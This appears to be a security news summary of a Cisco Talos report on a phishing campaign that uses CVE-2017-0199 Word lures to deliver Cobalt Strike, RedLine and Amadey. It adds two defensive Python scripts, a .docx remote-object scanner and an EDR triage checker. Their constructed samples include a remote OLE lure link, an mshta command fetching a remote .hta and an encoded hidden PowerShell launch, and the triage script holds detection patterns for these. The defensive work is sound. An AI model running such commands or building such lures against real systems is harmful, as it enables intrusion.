In August, Cisco Talos reported a malicious campaign delivering Cobalt Strike beacons that could serve as a foothold for later operations. Now the researchers have observed another modular campaign delivering Cobalt Strike to infected endpoints.

Diving into details

The attack begins with a phishing email posing as job details from a U.S. government organization or a trade union in New Zealand.
  • The email carries a malicious Word document with an exploit for CVE-2017-0199, a Microsoft Office vulnerability that lets a document load and execute remotely hosted content.
  • The final payload is a leaked version of the Cobalt Strike beacon, which includes commands for targeted process injection of arbitrary binaries.
  • The beacon is also configured with a high-reputation domain, a redirection technique used to hide its command-and-control traffic.
  • Other payloads observed in the campaign include the RedLine information stealer and the Amadey bot.
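As an added detection example (not code from the Talos report or from Cyware), the following Python scanner checks a .docx for the external OLE-object and attached-template relationships through which a CVE-2017-0199-style document pulls remote content. It deliberately ignores ordinary external hyperlinks, which are legitimate and common. The sample documents it builds and the target URL http://example.invalid/job-details.doc are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types through which Word fetches content from a remote target:
# the linked OLE object (the mechanism abused by CVE-2017-0199) and the
# attached template (the remote-template variant of the same trick).
REMOTE_LOADING_TYPES = ("/oleObject", "/attachedTemplate")


def scan_docx(data: bytes):
    """Return (rels_part, relationship_kind, target) for every relationship in
    the package that is marked External and belongs to a remote-loading type.
    External hyperlinks are not reported: they are clicked, not auto-loaded."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            # Relationship parts live under word/_rels/ (document, settings, headers...)
            if not (name.startswith("word/") and name.endswith(".rels")):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                findings.append((name, "malformed-rels", ""))
                continue
            for rel in root.iter(REL_NS + "Relationship"):
                rel_type = rel.get("Type", "")
                external = rel.get("TargetMode", "Internal").lower() == "external"
                if external and rel_type.endswith(REMOTE_LOADING_TYPES):
                    kind = rel_type.rsplit("/", 1)[-1]
                    findings.append((name, kind, rel.get("Target", "")))
    return findings


def build_docx(document_rels: str) -> bytes:
    """Build a minimal constructed .docx whose document.xml.rels is the given XML."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        z.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


RELS_NS_DECL = 'xmlns="http://schemas.openxmlformats.org/package/2006/relationships"'
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Constructed sample: a normal document with a styles part and a clickable link.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships {RELS_NS_DECL}>
  <Relationship Id="rId1" Type="{OFFICE_REL}/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OFFICE_REL}/hyperlink" Target="https://example.com/" TargetMode="External"/>
</Relationships>"""

# Constructed sample: the same document plus a linked OLE object whose target
# is a remote URL, the shape of a CVE-2017-0199 lure (URL is illustrative).
LURE_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships {RELS_NS_DECL}>
  <Relationship Id="rId1" Type="{OFFICE_REL}/styles" Target="styles.xml"/>
  <Relationship Id="rId3" Type="{OFFICE_REL}/oleObject" Target="http://example.invalid/job-details.doc" TargetMode="External"/>
</Relationships>"""


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("lure", LURE_RELS)):
        print(label, scan_docx(build_docx(rels)))
```

The scanner walks every relationship part under word/, so a remote template referenced from settings.xml.rels is caught as well as an OLE link in document.xml.rels; a relationship part that will not parse is reported rather than skipped, since malformed XML is itself a reason to look closer.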

Why this matters

  • Routing beacon traffic through a high-reputation domain lets the threat actors blend their command-and-control traffic with legitimate traffic and evade network detection.
  • The campaign is a textbook example of an attacker generating and executing malicious scripts in the victim's memory rather than writing them to disk, which sidesteps file-based detection.
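An added example, not from the original report, of the endpoint-side check a practitioner would run for the in-memory script stage described above: a small Python triage over constructed EDR-style process-creation records, flagging Office applications that spawn script hosts and command lines that carry encoded or download-and-execute payloads. The record schema (host, pid, parent_image, image, command_line) and the sample records are assumptions.

```python
import json
import re

# Parent processes that should not normally launch script interpreters.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and LOLBins commonly used to stage a payload straight into memory.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "cmd.exe", "regsvr32.exe", "rundll32.exe"}
# Command-line fragments typical of scripts executed without touching disk.
IN_MEMORY_INDICATORS = {
    "encoded-powershell": re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b"),
    "invoke-expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "download-cradle": re.compile(r"(?i)downloadstring|downloaddata|frombase64string"),
    "mshta-remote": re.compile(r"(?i)\bmshta(?:\.exe)?\s+(?:https?|vbscript|javascript):"),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(jsonl: str):
    """Return one alert per process record that matches the pattern described
    above: an Office parent spawning a script host, and/or a command line that
    carries in-memory execution indicators. Records are JSON, one per line."""
    alerts = []
    for line in jsonl.strip().splitlines():
        rec = json.loads(line)
        parent, child = basename(rec["parent_image"]), basename(rec["image"])
        cmd = rec.get("command_line", "")
        reasons = []
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            reasons.append(f"office-spawned-script-host:{parent}->{child}")
        reasons += [f"in-memory:{label}" for label, pat in IN_MEMORY_INDICATORS.items()
                    if pat.search(cmd)]
        if reasons:
            alerts.append({"host": rec["host"], "pid": rec["pid"], "reasons": reasons})
    return alerts


# Constructed EDR-style process-creation records (assumed schema, illustrative values).
SAMPLE_RECORDS = r"""
{"host":"ws01","pid":4210,"parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","image":"C:\\Windows\\System32\\mshta.exe","command_line":"mshta.exe http://example.invalid/jobs.hta"}
{"host":"ws01","pid":4388,"parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"}
{"host":"ws02","pid":612,"parent_image":"C:\\Windows\\System32\\services.exe","image":"C:\\Windows\\System32\\svchost.exe","command_line":"svchost.exe -k netsvcs"}
{"host":"ws02","pid":5120,"parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
"""

if __name__ == "__main__":
    for alert in triage(SAMPLE_RECORDS):
        print(alert)
```

The second sample record, an administrator's PowerShell script launched from Explorer and read from disk, is intentionally left unflagged: the parent-child pairing and the in-memory indicators are what separate the phishing chain from routine scripting, and the two reasons are kept separate so an analyst can see which one fired.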

Cobalt Strike in the news

  • Earlier this month, researchers observed hackers increasingly adopting Sliver and dropping Cobalt Strike, a shift driven by improved defenses against Cobalt Strike.
  • Last month, a new attack framework named Manjusaka appeared, described as a sibling of Cobalt Strike and Sliver.

The bottom line

Cobalt Strike is a modular, customizable attack framework that lets threat actors add or remove features to suit their intent. Cisco Talos recommends that organizations remain extremely vigilant and implement layered defenses to block attackers at the earliest stages of the infection chain.
Cyware Publisher